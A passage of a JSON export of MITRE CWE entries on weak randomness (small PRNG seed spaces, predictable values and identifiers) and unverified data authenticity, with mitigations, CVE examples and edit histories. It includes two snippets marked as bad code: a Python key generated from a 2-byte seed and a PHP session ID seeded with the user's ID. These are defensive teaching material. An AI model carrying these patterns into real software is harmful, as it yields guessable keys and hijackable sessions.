PRNG","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A Pseudo-Random Number Generator (PRNG) uses a relatively small seed space, which makes it more susceptible to brute force attacks.","Extended_Description":"PRNGs are entirely deterministic once seeded, so it should be extremely difficult to guess the seed. If an attacker can collect the outputs of a PRNG and then brute force the seed by trying every possibility to see which seed matches the observed output, then the attacker will know the output of any subsequent calls to the PRNG. A small seed space implies that the attacker will have far fewer possible values to try to exhaust all possibilities.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"335","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"341","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use well vetted pseudo-random number generating algorithms with adequate length seeds. Pseudo-random number generators can produce predictable numbers if the generator is known and the seed can be guessed. A 256-bit seed is a good starting point for producing a \\"random enough\\" number."},{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems, or use the more recent FIPS 140-3 [REF-1192] if possible."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This code grabs some random bytes and uses them for a seed in a PRNG, in order to generate a new cryptographic key.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"seed = os.urandom(2)random.seed(a=seed)key = random.getrandbits(128)","xhtml:i":"# getting 2 bytes of randomness for the seeding the PRNG","xhtml:br":["","","",""]}},"Body_Text":"Since only 2 bytes is used as a seed, an attacker will only need to guess 2^16 (65,536) values before being able to replicate the state of the PRNG."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-10908","Description":"product generates passwords via org.apache.commons.lang.RandomStringUtils, which uses java.util.Random internally. This PRNG has only a 48-bit seed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10908"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Small Seed Space in PRNG"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267","@_Section":"Annex C, Approved Random Number Generators"}},{"attr":{"@_External_Reference_ID":"REF-1192"}}]},"Notes":{"Note":[{"#text":"This entry may have a chaining relationship with predictable from observable state (CWE-341).","attr":{"@_Type":"Maintenance"}},{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Description, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References"}]}},"340":{"attr":{"@_ID":"340","@_Name":"Generation of Predictable Numbers or Identifiers","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product uses a scheme that generates numbers or identifiers that are more predictable than required.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Predictability problems"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":11,"Entry_Name":"Brute Force"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 20: Weak Random Numbers.&#34; Page 299"}}},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Predictability Problems","attr":{"@_Date":"2020-02-24"}}}},"341":{"attr":{"@_ID":"341","@_Name":"Predictable from Observable State","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A number or object is predictable based on observations that the attacker can make about the state of the system or network, such as time, process ID, etc.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"340","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context","Note":"This weakness could be exploited by an attacker in a number ways depending on the context. If a predictable number is used to generate IDs or keys that are used within protection mechanisms, then an attacker could gain unauthorized access to the system. If predictable filenames are used for storing sensitive information, then an attacker might gain access to the system and may be able to gain access to the information in the file."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Increase the entropy used to seed a PRNG."},{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C (\\"Approved Random Number Generators\\")."},{"attr":{"@_Mitigation_ID":"MIT-50"},"Phase":"Implementation","Description":"Use a PRNG that periodically re-seeds itself using input from high-quality sources, such as hardware devices with high entropy. However, do not re-seed too frequently, or else the entropy source might block."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-45"},"Intro_Text":"This code generates a unique random identifier for a user\'s session.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function generateSessionID($userID){}","xhtml:div":{"#text":"srand($userID);return rand();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":["Because the seed for the PRNG is always the user\'s ID, the session ID will always be the same. An attacker could thus predict any user\'s session ID and potentially hijack the session.","This example also exhibits a Small Seed Space (CWE-339)."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0389","Description":"Mail server stores private mail messages with predictable filenames in a world-executable directory, which allows local users to read private mailing list archives.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0389"},{"Reference":"CVE-2001-1141","Description":"PRNG allows attackers to use the output of small PRNG requests to determine the internal state information, which could be used by attackers to predict future pseudo-random numbers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1141"},{"Reference":"CVE-2000-0335","Description":"DNS resolver library uses predictable IDs, which allows a local attacker to spoof DNS query results.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0335"},{"Reference":"CVE-2005-1636","Description":"MFV. predictable filename and insecure permissions allows file modification to execute SQL queries.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1636"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Predictable from Observable State"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 20: Weak Random Numbers.&#34; Page 299"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}]}},"342":{"attr":{"@_ID":"342","@_Name":"Predictable Exact Value from Previous Values","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"An exact value or random number can be precisely predicted by observing previous values.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"340","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Increase the entropy used to seed a PRNG."},{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C (\\"Approved Random Number Generators\\")."},{"attr":{"@_Mitigation_ID":"MIT-50"},"Phase":"Implementation","Description":"Use a PRNG that periodically re-seeds itself using input from high-quality sources, such as hardware devices with high entropy. However, do not re-seed too frequently, or else the entropy source might block."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1463","Description":"Firewall generates easily predictable initial sequence numbers (ISN), which allows remote attackers to spoof connections.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1463"},{"Reference":"CVE-1999-0074","Description":"Listening TCP ports are sequentially allocated, allowing spoofing attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0074"},{"Reference":"CVE-1999-0077","Description":"Predictable TCP sequence numbers allow spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0077"},{"Reference":"CVE-2000-0335","Description":"DNS resolver uses predictable IDs, allowing a local user to spoof DNS query results.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0335"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Predictable Exact Value from Previous Values"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 20: Weak Random Numbers.&#34; Page 299"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}]}},"343":{"attr":{"@_ID":"343","@_Name":"Predictable Value Range from Previous Values","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software\'s random number generator produces a series of values which, when observed, can be used to infer a relatively small range of possibilities for the next value that could be generated.","Extended_Description":"The output of a random number generator should not be predictable based on observations of previous values. In some cases, an attacker cannot predict the exact value that will be produced next, but can narrow down the possibilities significantly. This reduces the amount of effort to perform a brute force attack. For example, suppose the product generates random numbers between 1 and 100, but it always produces a larger value until it reaches 100. If the generator produces an 80, then the attacker knows that the next value will be somewhere between 81 and 100. Instead of 100 possibilities, the attacker only needs to consider 20.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"340","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Increase the entropy used to seed a PRNG."},{"attr":{"@_Mitigation_ID":"MIT-2"},"Phase":["Architecture and Design","Requirements"],"Strategy":"Libraries or Frameworks","Description":"Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C (\\"Approved Random Number Generators\\")."},{"attr":{"@_Mitigation_ID":"MIT-50"},"Phase":"Implementation","Description":"Use a PRNG that periodically re-seeds itself using input from high-quality sources, such as hardware devices with high entropy. However, do not re-seed too frequently, or else the entropy source might block."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Predictable Value Range from Previous Values"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-320"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 20: Weak Random Numbers.&#34; Page 299"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes"}]}},"344":{"attr":{"@_ID":"344","@_Name":"Use of Invariant Value in Dynamically Changing Context","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a constant value, name, or reference, but this value can (or should) vary across different environments.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2002-0980","Description":"Component for web browser writes an error message to a known location, which can then be referenced by attackers to process HTML/script in a less restrictive context","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0980"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Static Value in Unpredictable Context"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-267"}}},"Notes":{"Note":{"#text":"overlaps default configuration.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Relationship_Notes, Relevant_Properties, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Static Value in Unpredictable Context","attr":{"@_Date":"2008-04-11"}}}},"345":{"attr":{"@_ID":"345","@_Name":"Insufficient Verification of Data Authenticity","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not sufficiently verify the origin or authenticity of data, in a way that causes it to accept invalid data.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insufficient Verification of Data"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":12,"Entry_Name":"Content Spoofing"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"111"}},{"attr":{"@_CAPEC_ID":"141"}},{"attr":{"@_CAPEC_ID":"142"}},{"attr":{"@_CAPEC_ID":"148"}},{"attr":{"@_CAPEC_ID":"218"}},{"attr":{"@_CAPEC_ID":"384"}},{"attr":{"@_CAPEC_ID":"385"}},{"attr":{"@_CAPEC_ID":"386"}},{"attr":{"@_CAPEC_ID":"387"}},{"attr":{"@_CAPEC_ID":"388"}},{"attr":{"@_CAPEC_ID":"665"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 15: Not Updating Easily.&#34; Page 231"}}},"Notes":{"Note":[{"#text":"\\"origin validation\\" could fall under this.","attr":{"@_Type":"Relationship"}},{"#text":"The specific ways in which the origin is not properly identified should be laid out as separate weaknesses. In some sense, this is more like a 